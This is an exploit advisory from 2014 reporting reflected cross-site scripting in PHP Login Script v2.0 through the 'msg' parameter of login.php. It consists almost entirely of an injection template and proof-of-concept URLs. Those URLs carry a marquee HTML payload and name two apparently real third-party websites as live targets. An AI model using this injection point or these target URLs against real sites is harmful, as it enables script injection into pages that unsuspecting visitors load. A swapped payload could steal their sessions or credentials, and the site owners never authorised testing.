[+] Cross Site Scripting on PHP Login Script v2.0
[+] Date: 24/03/2014
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://php-login-script.com/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: login.php
[+] Version: v2.0
[+] Exploit : http://host/patch/login.php?msg=[XSS]
[+] PoC : http://tkenu.com/login/login.php?msg=<marquee>Xss%20By%20Felipe</marquee>
          http://www.natpcs.com.au/admin/login.php?msg=<marquee>Xss By Felipe</marquee>